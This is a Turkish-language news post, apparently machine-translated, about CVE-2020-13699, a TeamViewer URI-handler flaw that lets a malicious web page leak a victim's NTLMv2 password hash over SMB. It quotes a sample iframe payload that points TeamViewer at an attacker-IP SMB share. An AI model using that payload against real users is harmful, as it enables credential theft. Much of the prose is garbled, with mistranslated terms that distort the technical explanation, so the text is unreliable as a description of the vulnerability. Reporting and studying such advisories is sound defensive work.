TeamViewer, son zamanlarda yüksek riskli bir zayıflığa (CVE 2020-13699) yöneldi; bu, uzaktaki saldırganlar tarafından sistem şifre ifadesini almak ve makul bir şekilde pazarlık etmek için kötüye kullanılabilir.

 TeamViewer, denetleyici, çalışma alanı paylaşımı, çevrimiçi toplantılar, web konferansı ve bilgisayarlar arasında belge taşıma için ünlü popüler bir yazılım uygulamasıdır.

 Bir “Alıntılanmayan Edilmemiş URL işleyicisi” olarak atanan zayıflık, yaralıları kötü niyetli bir siteyi ziyaret etmeye kandırarak ortadan kaldırılabilir. Zayıflık, Praeorian’dan uzmanlar Jeffrey Hofmann tarafından bulundu, TeamViewer’ın özel URI işleyicilerinden alıntı yaptığı şekilde yaşıyor.  Master, sorunun saldırganın ürünü saldırganın çerçevesine bir NTLM doğrulama talebini devretmesine izin verebileceğini buldu.

 TeamViewer’ın URL planındaki sorun, saldırı tarafından oluşturulan bir web sitesi sayfasının kazazedenin çerçevesinde tanıtılan bilgisayarlar uygulamayı aldatarak SMB paylaşımından çok uzak olduğu iddia edilen saldırganla bir ilişkilendirme başlatmasına izin verir. Bu, SMB doğrulama prosedürünün sistem kullanıcı adını ve gizli anahtarın NTLMv2 karma biçimini saldırganlara yayınlayacağı anlamına gelir.

 Saldırgan, bir siteye kötü niyetli bir şirketleri ekleyebilir ve daha sonra, bu zararlı URL’yi ziyaret etmeye yaralıları engelleyebilir.  Söz konusu kişilere verilen bağlantıya dokunduktan sonra, TeamViewer doğal olarak Windows çalışma alanı müşterisini gönderecek ve uzaktaki bir SMB paylaşımını açacaktır.SMB

TeamViewer Güvenlik Açığı

(CVE-2020-13699) Güvenlik Açığı Ayrıntıları:

  • CVE-2020-13699, alıntı yapılmamış bir arama yolu veya bileşenden kaynaklanan bir güvenlik kusurudur.  Özellikle, bu zayıflık, uygulamanın kendi özel URL işleyicilerini etkili bir şekilde belirtmemesinden kaynaklanmaktadır.
  •  Çaresiz bir TeamViewer uyarlamasına sahip bir müşteri, bu zayıflığı kötüye kullanmak için zararlı bir siteyi ziyaret ederek kandırılır.
  •  Praetorian’da güvenlik mühendisi olan Jeffrey Hofmann’ın belirttiği gibi, “Saldırgan, oluşturulmuş bir URL’ye sahip bir siteye kötü niyetli bir iframe (iFrame, bir sayfa içine dökümanlar, videolar ve interaktif medya yerleştirmenizi sağlayan bir HTML elementidir.) yükleyebilir (iframe src = ‘teamviewer10: – play \\ attacker-IP \ share \  fake.tvs ‘), TeamViewer Windows çalışma alanı müşterisini gönderir ve onu uzaktaki bir SMB paylaşımını açmak için güçlendirir. “
  •  Windows, SMB paylaşımını açarken NTLM onayı gerçekleştirecektir.  Bu talep aktarılabilir, yani saldırganın, doğrulanmış müşterinin menfaatini kullanarak uzaktaki işçi üzerinde prosedür gerçekleştirme kapasitesini kabul ederek bir onay yakalayıp başka bir çalışana göndermesine izin verir.
  •  Bu zayıflığın verimli bir şekilde kötüye kullanılması, uzaktaki bir saldırganın TeamViewer’ı rastgele parametrelerle başlatmasına olanak verir.  Uygulama, bağlantısız gökkuşağı tablosu saldırılarını ve canavar gücü kırma girişimlerini güçlendiren saldırganın çerçevesine bir NTLM onay talebini devretmeye zorlanabilir.
  •  Bu saldırılar, zayıflığın etkili bir şekilde suistimal edilmesinden alınan akreditasyonlar nedeniyle fazladan kötüye kullanıma yol açabilir.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir